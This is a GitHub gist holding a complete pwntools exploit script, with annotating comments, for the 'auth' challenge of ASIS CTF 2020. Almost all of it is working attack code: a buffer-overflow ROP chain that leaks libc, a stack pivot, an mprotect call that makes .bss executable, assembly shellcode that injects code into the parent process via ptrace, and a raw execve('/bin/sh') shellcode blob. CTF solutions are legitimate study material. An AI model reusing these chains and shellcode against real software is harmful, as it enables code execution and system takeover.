
@dialluvioso
Created December 13, 2020 22:38
Exploit for auth challenge ASIS CTF 2020
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# pwntools exploit script for the "auth" challenge of ASIS CTF 2020.
#
# What the script itself shows, stage by stage:
#   stage 1 (payload)   - overflow the "Username:" buffer with a ROP chain that
#                         leaks a libc pointer through a printf in main, reads a
#                         second chain into .bss and pivots the stack onto it.
#   stage 2 (payload2)  - mprotect() the 0x603000 page RWX, read two blobs
#                         (`dummy`, then `shellcode`) into .bss and jump to the
#                         assembled `shellcode`.
#   stage 3 (shellcode) - ptrace()-based injection of `dummy` into the parent
#                         process, then exit.
#
# NOTE(review): every address below is hard-coded, so this only works against a
# binary loaded at a fixed base (non-PIE) with a writable-then-executable .bss
# page. PIE/full RELRO, a seccomp filter denying ptrace or mprotect(PROT_EXEC),
# or Yama ptrace_scope > 0 would each break one stage of the chain.
from pwn import *
HOST = "69.90.132.134"
PORT = 3317
# NOTE(review): HOST/PORT are never referenced below - the only target created
# is the local process() a few lines down, so LOCAL only selects libc offsets.
LOCAL = False
#context.log_level = "debug"
context.terminal = ["tmux", "sp", "-h"]
context.arch = "amd64"
# Run the challenge through its bundled loader with the bundled libc preloaded;
# "/tmp/" is the single program argument the binary receives.
io = process(["./ld.so", "./auth", "/tmp/"], env = {"LD_PRELOAD": "./libc.so.6"})
# ROP gadgets in the binary; the trailing comments are the author's disassembly
# of each. pop_rbp, pop_r14 and prepare_ch_call are defined but not used in
# either chain below.
pop_rsp = 0x0000000000401063 # pop rsp ; ret
pop_rdi = 0x00000000004019a3 # pop rdi ; ret
pop_rbp = 0x0000000000400e96 # pop rbp ; ret
pop_rsi = 0x00000000004017fa # pop rsi ; ret
pop_r14 = 0x00000000004017f9 # pop r14 ; ret
pop_rdx_rbx_rbp = 0x0000000000400e8f # pop rdx ; mov eax, 1 ; pop rbx ; pop rbp ; ret
prepare_ch_call = 0x000000000040183c # mov rdi, r12 ; call rbp
alarm_got = 0x0000000000603068 # GOT slot of alarm(); its contents are what gets leaked
printf_main = 0x0000000000400E7C # presumably a printf call site in main (prints "Usage: ...") - verify in the disassembly
read_fcsmp = 0x00000000004010EA # presumably a read() call site, used as a read(rdi, rsi, rdx) primitive - verify
# Offsets of alarm() and mprotect() inside libc, one pair per libc build.
# NOTE(review): the bodies of this if/else lost their indentation when the gist
# was rendered; each pair of assignments must be indented under its branch.
if LOCAL:
DELTA_ALARM = 0xcb2d0
DELTA_MPROTECT = 0xf8be0
else:
DELTA_ALARM = 0xe5f10
DELTA_MPROTECT = 0x11bb00
# Stage-3 shellcode (amd64). Everything it does is aimed at the parent process
# through ptrace; syscall numbers are the x86-64 ones:
#   getppid()                                   rax=0x6e  -> r14 = parent pid
#   ptrace(PTRACE_ATTACH=16, r14, 0, 0)         rax=0x65
#   wait4(r14, 0x603200, 0, 0)                  rax=0x3d  wait for the attach stop;
#                                                         the status lands at 0x603200
#   for i in 0..6:
#     ptrace(PTRACE_POKEDATA=5, r14, 0x401000+4*i, *(u64*)(0x603900+4*i))
#       each poke stores 8 bytes at a 4-byte stride, so successive writes
#       overlap; the net effect is copying the bytes at 0x603900 (where stage 2
#       read `dummy`) to 0x401000 in the parent. `mul rcx` also clobbers rdx,
#       which is harmless because rdx is reassigned right after.
#   *(u64*)0x603280 = 0x401000                  0x603200 + 0x80 is the rip slot of
#                                                struct user_regs_struct
#   ptrace(PTRACE_SETREGS=13, r14, 0, 0x603200) rax=0x65  parent will resume at 0x401000
#   exit()                                      rax=0x3c  (rdi is still 13 here)
# NOTE(review): the register buffer at 0x603200 is never filled by a
# PTRACE_GETREGS first, so apart from the wait status and the rip slot the
# parent's registers are set from whatever .bss holds there (zeros, presumably).
shellcode = asm("""
mov rax, 0x6e
syscall
mov r14, rax
mov r10, 0
mov rdx, 0
mov rsi, r14
mov rdi, 16
mov rax, 0x65
syscall
mov r10, 0
mov rdx, 0
mov rsi, 0x603200
mov rdi, r14
mov rax, 0x3d
syscall
mov r13, 0x603900
xor r15, r15
loop:
cmp r15, 7
je ok
mov r10, [r13+r15*4]
mov rax, r15
mov rcx, 4
mul rcx
add rax,0x00401000
mov rdx, rax
mov rsi, r14
mov rdi, 5
mov rax, 0x65
syscall
inc r15
jmp loop
ok:
mov rax, 0x00401000
mov qword ptr [0x603280], rax
mov r10, 0x603200
mov rdx, 0
mov rsi, r14
mov rdi, 13
mov rax, 0x65
syscall
mov rax, 0x3c
syscall
""")
# Stage 1: 56 bytes of filler reach the saved return address, then the chain.
payload = b""
payload += b"A" * 56
# rdx = &alarm@GOT, rbx = 0x603180, rbp = 0x603980 (eax = 1 is a gadget side
# effect), then into main's printf: the text after "Usage: " is expected to
# carry the GOT contents. rbp = 0x603980 is kept the same across every gadget
# below, presumably because the called code addresses locals via rbp - verify.
payload += p64(pop_rdx_rbx_rbp)
payload += p64(alarm_got) + p64(0x603180) + p64(0x603980)
payload += p64(printf_main)
payload += p64(0) * 3 # presumably consumed by pops/leave between printf_main and its ret - verify
# read(0, 0x603580, 0x500): fetch payload2 into .bss.
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(pop_rsi)
payload += p64(0x603580)
payload += p64(pop_rdx_rbx_rbp)
payload += p64(0x500) + p64(0x603180) + p64(0x603980)
payload += p64(read_fcsmp)
payload += p64(0x0000000000400538) * 64 # 64 copies of what is presumably a plain `ret` (a sled) - verify
# Stack pivot onto the buffer just read; payload2 executes from 0x603580.
payload += p64(pop_rsp)
payload += p64(0x603580)
io.sendlineafter("Username:", payload)
io.recvuntil("Usage: ")
# Read up to and including the 0x7f byte (top byte of a canonical user-space
# address) and zero-extend to 8 bytes. Assumes the pointer immediately follows
# "Usage: " with nothing in between - verify against the binary's format string.
leak = u64(io.recvuntil("\x7f").ljust(8, b"\x00"))
log.info("leak: %#lx" % leak)
glibc = leak - DELTA_ALARM
log.info("glibc at %#lx" % glibc)
# Stage 2, run from the pivoted stack at 0x603580.
payload2 = b""
# mprotect(0x603000, 0x1000, 7): PROT_READ|PROT_WRITE|PROT_EXEC on the page
# holding the GOT and every .bss buffer used here, so the blobs read below can
# run in place.
payload2 += p64(pop_rdi)
payload2 += p64(0x603000)
payload2 += p64(pop_rsi)
payload2 += p64(0x1000)
payload2 += p64(pop_rdx_rbx_rbp)
payload2 += p64(0x7) + p64(0x0) + p64(0x603980)
payload2 += p64(glibc + DELTA_MPROTECT)
# read(0, 0x603900, 0x200): receives `dummy` (sent first below).
payload2 += p64(pop_rdi)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(0x603900)
payload2 += p64(pop_rdx_rbx_rbp)
payload2 += p64(0x200) + p64(0x603180) + p64(0x603980)
payload2 += p64(read_fcsmp)
payload2 += p64(0x0000000000400538) * 64
# read(0, 0x603500, 0x200): receives `shellcode` (sent second below).
payload2 += p64(pop_rdi)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(0x603500)
payload2 += p64(pop_rdx_rbx_rbp)
payload2 += p64(0x200) + p64(0x603180) + p64(0x603980)
payload2 += p64(read_fcsmp)
payload2 += p64(0x0000000000400538) * 64
# Return straight into the shellcode just read.
payload2 += p64(0x603500)
io.sendline(payload2)
# 27 raw bytes that stage 3 copies into the parent at 0x401000. From the
# encoding this looks like the usual execve("/bin/sh") stub (xor eax,eax /
# movabs+neg of "/bin/sh" / push-pop argument setup / mov al,0x3b / syscall) -
# confirm by disassembling. sendline() appends a newline, which the 7-qword
# copy loop in the shellcode also carries along (harmless trailing bytes).
dummy = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
io.sendline(dummy)
io.sendline(shellcode)
io.interactive()